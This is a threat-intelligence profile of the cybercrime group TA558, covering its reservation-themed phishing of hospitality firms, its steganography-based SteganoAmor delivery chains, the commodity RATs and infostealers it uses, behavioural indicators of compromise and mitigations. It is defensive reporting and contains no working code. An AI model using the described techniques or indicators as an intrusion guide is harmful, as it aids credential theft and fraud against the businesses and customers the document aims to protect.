analyst @ nohacky :~/threat-actors $
cat / threat-actors / ta558
analyst@nohacky:~/ta558.html
active threat profile
type Cybercrime
threat_level MEDIUM
status ACTIVE
origin Unknown (Latin America focus)
last_updated 2026-03-13
T5
ta558

TA558

also known as: SteganoAmor (campaign name)

TA558 is a financially motivated cybercrime group active since at least April 2018, primarily targeting hospitality, hotel, travel, and tourism organizations in Latin America with reservation-themed phishing campaigns. Designated by Proofpoint as a "small crime threat actor," the group has distributed at least 15 different malware families and evolved from simple Office exploits to sophisticated steganography-based delivery chains in its SteganoAmor campaign, which has impacted over 320 organizations worldwide across industrial, public, energy, and construction sectors.

attributed origin Unknown (Latin America focus)
suspected sponsor Cybercriminal (unknown affiliation)
first observed 2018
primary motivation Financial / Data Theft
primary targets Hospitality, Travel, Tourism, Industrial
known campaigns 320+ (SteganoAmor alone)
mitre att&ck group N/A (Proofpoint designation)
target regions Latin America, W. Europe, N. America, Global
threat level MEDIUM

Overview

TA558 is a financially motivated cybercrime group first identified by Proofpoint in April 2018, primarily targeting hospitality, hotel, travel, and tourism organizations in Latin America with secondary targeting in Western Europe and North America. Proofpoint characterizes the group as a "small crime threat actor" that sends malicious emails in Portuguese, Spanish, and occasionally English, using reservation-themed lures related to hotel room bookings and travel arrangements to trick employees in the hospitality sector into opening malicious attachments or clicking malicious URLs.

What distinguishes TA558 from typical phishing operators is the group's remarkable adaptability and the breadth of its malware arsenal. Over its operational history, TA558 has deployed at least 15 different malware families, with the most frequently observed payloads including Loda RAT, Vjw0rm, AsyncRAT, Revenge RAT, Agent Tesla, FormBook, Remcos RAT, LokiBot, Snake Keylogger, XWorm, and GuLoader. The group has demonstrated consistent willingness to adapt its delivery techniques in response to defensive changes, pivoting from Equation Editor exploits (CVE-2017-11882) to macro-enabled documents, then to container files (ISO, RAR) and URLs after Microsoft disabled macros by default in 2022.

In 2024, Positive Technologies uncovered TA558's SteganoAmor campaign, revealing over 320 attacks worldwide. This campaign marked a significant evolution in the group's sophistication, using steganography to embed malicious code within images and text files to evade content filters. The group also began using compromised legitimate SMTP servers for phishing delivery and compromised FTP servers for command-and-control, giving its operations a veneer of legitimacy. Targets expanded beyond hospitality to include industrial, public sector, electric power, construction, oil and gas, and maritime organizations across Latin America, Russia, Romania, Turkey, Japan, and other countries.

TA558's operations share tooling and infrastructure overlaps with other threat groups including Aggah and Blind Eagle, suggesting participation in a broader commodity malware ecosystem. The group continues to exploit the seven-year-old CVE-2017-11882 vulnerability in Microsoft Office Equation Editor, highlighting the persistent risk to organizations that have not updated legacy Office installations. Despite being classified as a "small" threat actor, TA558's global reach, diverse malware arsenal, and expanding target sectors make it a notable and persistent threat.

Target Profile

TA558 primarily targets Portuguese and Spanish speakers in Latin America, with additional targeting in Western Europe and North America. The SteganoAmor campaign expanded global reach to include Russia, Romania, Turkey, Japan, and other regions. The group focuses on organizations where reservation-themed lures appear legitimate, and where stolen customer data (including credit cards) has direct financial value.

  • Hospitality and hotels: The core target sector since 2018. Hotels are targeted for customer payment card data, Booking.com account credentials, and guest personal information. A Lisbon hotel had its Booking.com account compromised, resulting in $511,314 stolen from customers. Compromised hotel websites are also used to host malware payloads.
  • Travel and tourism: Travel agencies, tour operators, and airlines targeted with booking and reservation-themed lures. Customer data, itinerary information, and payment credentials are primary objectives.
  • Industrial and manufacturing: Expanded targeting since 2019. The SteganoAmor campaign specifically impacted industrial, construction, and manufacturing sectors. Oil, gas, and maritime organizations increasingly targeted in 2023-2024.
  • Government and public sector: Public institutions targeted in the SteganoAmor campaign, particularly in Latin America. Government organizations in Russia and Belarus also targeted per F.A.C.C.T. reporting.
  • Financial services and banking: Banks and financial institutions targeted, particularly for credential theft via Agent Tesla and FormBook infostealers.
  • Energy and utilities: Electric power and energy sector organizations identified as SteganoAmor campaign targets, representing an expansion from TA558's traditional hospitality focus.
  • Business services: Consulting firms, service providers, and business support organizations targeted since 2019 expansion beyond pure hospitality focus.

Tactics, Techniques & Procedures

TA558's TTPs have evolved significantly from 2018 to present, adapting to defensive changes while maintaining consistent reservation-themed lure content and Latin American targeting focus.

mitre id technique description
T1566.001 Phishing: Spearphishing Attachment Primary initial access method. Emails use reservation-themed lures in Portuguese, Spanish, and English (e.g., "reserva" themes, hotel booking confirmations). Attachments include Word/Excel documents, RAR/ZIP/ISO archives, and XHTML files with HTML smuggling. Sent from compromised legitimate SMTP servers to bypass email gateways.
T1203 Exploitation for Client Execution Extensively exploits CVE-2017-11882 (Microsoft Office Equation Editor RCE) across all campaign phases from 2018 to present. Despite being patched in 2017, this vulnerability remains effective against organizations running unpatched legacy Office installations. Documents trigger exploit upon opening to download subsequent payloads.
T1027.003 Obfuscated Files or Information: Steganography Signature technique in the SteganoAmor campaign. Embeds VBScript, PowerShell code, and reversed Base64-encoded executables within images hosted on legitimate services. Uses steganography to bypass content filters and antivirus detection. Payloads retrieved from free image-uploading and text-sharing websites.
T1059.001 Command and Scripting Interpreter: PowerShell PowerShell scripts embedded within steganographic payloads retrieve final-stage malware. Base64-encoded and obfuscated PowerShell used throughout the SteganoAmor delivery chain to download and execute payloads from images and text files.
T1059.005 Command and Scripting Interpreter: Visual Basic VBA macros in Office documents (pre-2022) and standalone VBScript files used for payload download and execution. VBS downloaders triggered by CVE-2017-11882 exploit fetch steganographic images from legitimate hosting services.
T1071.001 Application Layer Protocol: Web Protocols Uses compromised legitimate FTP servers for C2 and payload staging. Stolen data (Agent Tesla output) stored as HTML files on compromised servers. Leverages legitimate cloud services (Google Drive, paste sites, image hosting) for payload retrieval infrastructure.
T1102 Web Service Extensively uses legitimate web services for payload hosting and retrieval, including Google Drive, free image uploading sites, and text-sharing platforms. Abuses these services to host steganographic images and encoded payloads, complicating network-based detection.
T1036 Masquerading Malware payloads disguised within seemingly innocuous image files and documents. Uses file names themed around love and affection (e.g., greatloverstory.vbs, easytolove.vbs) in the SteganoAmor campaign. Container files (ISO, RAR) mask executable content.
T1555 Credentials from Password Stores Deployed malware (Agent Tesla, FormBook, LokiBot, Snake Keylogger) harvests stored credentials from web browsers, email clients, and other applications. Credential theft from hotel booking platforms (e.g., Booking.com) enables downstream fraud against customers.
T1056.001 Input Capture: Keylogging Agent Tesla, Snake Keylogger, and other deployed payloads capture keystrokes to harvest credentials, payment card data, and other sensitive information typed by victims. Screenshots also captured for intelligence gathering.

Known Campaigns

TA558 operates as a continuous campaign actor rather than executing discrete named operations. Proofpoint tracked 51 campaigns in 2022 alone. Key phases of evolution are documented below.

Initial Hospitality Targeting (Equation Editor Phase) 2018-2019

TA558's initial operational phase, using malicious Word attachments exploiting CVE-2017-11882 (Equation Editor) and remote template URLs. Delivered Loda RAT and Revenge RAT. Campaigns conducted exclusively in Spanish and Portuguese, targeting hospitality sectors with "reserva" (reservation) themed lures. In 2019, expanded targeting to business services and manufacturing, began using English-language lures, and added Vjw0rm to the payload arsenal.

Macro-Enabled Document Phase 2020-2021

Shifted from Equation Editor exploits to macro-enabled Office documents (Word, PowerPoint, Excel) with VBA code. Added AsyncRAT to the malware toolkit. Conducted five URL-based campaigns between 2018-2021. Activity overlapped with reporting from Palo Alto Networks (2018), Cisco Talos (2020-2021), Uptycs (2020), and HP (2022).

Post-Macro Pivot & Operational Surge 2022

Major operational surge with 51 campaigns observed by Proofpoint. Pivoted from macro-enabled documents to container files (ISO, RAR) and URLs after Microsoft disabled macros by default. Conducted 27 URL-based campaigns in 2022 alone (vs. 5 total in 2018-2021). Delivered Loda, Revenge RAT, and AsyncRAT via new file types including Windows Shortcut (LNK) files. Compromised hotel websites used to host malware payloads and provide C2 legitimacy.

SteganoAmor Campaign 2023-2024

TA558's most sophisticated campaign to date, uncovered by Positive Technologies with over 320 attacks identified worldwide. Used steganography to embed malicious code within images and text files, with payloads retrieved from legitimate hosting services. Continued exploiting CVE-2017-11882. Delivered Agent Tesla, FormBook, Remcos RAT, LokiBot, GuLoader, Snake Keylogger, and XWorm. Used compromised SMTP servers for phishing and FTP servers for C2. Targeting expanded globally to include industrial, public sector, energy, construction, oil/gas, and maritime organizations across Latin America, Russia, Romania, Turkey, and Japan. F.A.C.C.T. reported attacks on enterprises, government agencies, and banks in Russia and Belarus using the same techniques.

Tools & Malware

TA558 exclusively uses commodity and off-the-shelf malware rather than custom tools, deploying at least 15 different malware families with overlapping C2 domains. This payload diversity is a defining characteristic of the group.

  • Agent Tesla: Keylogger and credential stealer. Primary payload in SteganoAmor campaigns. Captures keystrokes, screenshots, and credentials from browsers and email clients. Stolen data stored as HTML files on compromised servers with naming pattern PW_*PC_name*_*date*_*time*.html.
  • Remcos RAT: Commercial remote access tool enabling full control of compromised machines. Deployed in SteganoAmor and earlier campaigns. Used for reconnaissance, data theft, and follow-on payload delivery.
  • FormBook / XLoader: Information stealer targeting credentials from web browsers, capturing screenshots, and enabling file download/execution. Frequently deployed alongside Agent Tesla in SteganoAmor attacks.
  • LokiBot: Information stealer targeting stored credentials and sensitive data from browsers, email clients, and other applications.
  • Loda RAT: One of TA558's earliest and most consistently deployed payloads since 2018. Provides remote access, keystroke logging, and data exfiltration capabilities.
  • Revenge RAT: Remote access trojan deployed since early TA558 operations. Provides full remote control, keylogging, and credential harvesting.
  • AsyncRAT: Open-source remote access tool added to TA558's arsenal around 2020. Provides remote desktop, keylogging, and file management capabilities.
  • Vjw0rm: JavaScript-based worm and RAT used in TA558 campaigns, capable of self-propagation via USB drives and providing remote access.
  • Snake Keylogger: Credential stealer focused on keystroke logging and screenshot capture. Deployed in SteganoAmor campaign.
  • XWorm: Remote access trojan providing command execution and access to sensitive information on compromised systems. Deployed in SteganoAmor attacks.
  • GuLoader: Downloader that aids in evading antivirus detection. Used as an intermediate loader in SteganoAmor chains to fetch final-stage payloads.

Indicators of Compromise

TA558 uses commodity malware with overlapping C2 domains and compromised legitimate infrastructure, making static IOC tracking challenging. Positive Technologies published a comprehensive IOC list with the SteganoAmor report.

warning

TA558 uses compromised legitimate SMTP and FTP servers for delivery and C2, making IP/domain blocking of infrastructure risky (legitimate services may be affected). Focus on payload and behavioral detection alongside infrastructure indicators.

indicators of compromise — behavioral patterns
exploit CVE-2017-11882 (Microsoft Office Equation Editor RCE) -- primary exploit across all phases
steganography Images from legitimate hosting services containing Base64-encoded payloads (reversed)
lure theme Reservation / booking confirmations in Portuguese, Spanish, English
file names Love-themed VBS: greatloverstory.vbs, easytolove.vbs (SteganoAmor signature)
data exfil Agent Tesla output: PW_*PCname*_*date*_*time*.html on compromised FTP servers
infrastructure Compromised legitimate SMTP servers for phishing; compromised FTP servers for C2

Mitigation & Defense

Organizations in the hospitality, travel, and tourism sectors in Latin America are at highest risk. The continued exploitation of a 2017 vulnerability makes patching the single highest-impact defensive action.

  • Patch Microsoft Office (CVE-2017-11882): This is the single highest-impact mitigation. TA558's entire SteganoAmor attack chain relies on a vulnerability patched in 2017. Updating Microsoft Office to any version released after November 2017 renders the primary infection vector completely ineffective. Audit all endpoints for legacy Office installations.
  • Implement steganalysis in email security: Deploy email security solutions capable of detecting steganographic payloads within image and text file attachments. Monitor for VBScript, PowerShell code, and Base64-encoded content embedded within image files. Consider sandboxing all image attachments from external sources.
  • Block macro and script execution: Disable VBA macros in Office documents from external sources. Block HTA file execution via email attachments. Implement Attack Surface Reduction (ASR) rules to prevent Office applications from creating child processes or executing scripts.
  • Monitor for commodity RAT indicators: Deploy endpoint detection for Agent Tesla, Remcos, FormBook, LokiBot, and other commodity malware families used by TA558. Monitor for keylogger activity, credential store access, and screenshot capture behavior.
  • Audit SMTP and FTP server security: TA558 compromises legitimate servers for phishing delivery and C2. Monitor your own SMTP and FTP servers for unauthorized use. Implement SPF, DKIM, and DMARC to prevent your domains from being spoofed in TA558 phishing campaigns.
  • Train hospitality staff on reservation-themed phishing: Educate front desk, reservations, and booking staff to recognize phishing emails disguised as legitimate reservations. TA558 lures are specifically designed to appear as normal business communications in the hospitality sector.
  • Monitor connections to payload hosting services: Alert on downloads of VBS, PowerShell, or executable content from free image-uploading and text-sharing websites. Monitor for unusual Google Drive downloads triggered by Office document opens.
  • Protect booking platform credentials: Enforce MFA on all booking platform accounts (Booking.com, Expedia, etc.). Monitor for unauthorized access to these accounts, which TA558 has compromised for downstream customer fraud.
note

TA558 shares tooling and infrastructure patterns with Aggah and Blind Eagle (APT-C-36), suggesting participation in a broader commodity malware ecosystem serving Latin American cybercriminals. Attribution of specific attacks to TA558 vs. overlapping groups can be challenging due to shared malware families and infrastructure. Note: an earlier report incorrectly identified TA558 as synonymous with TA505; these are separate threat actors. TA558 is a significantly smaller operation focused on hospitality, while TA505 is a larger group associated with Dridex and Clop ransomware.

Sources & Further Reading

Attribution and references used to build this profile.

— end of profile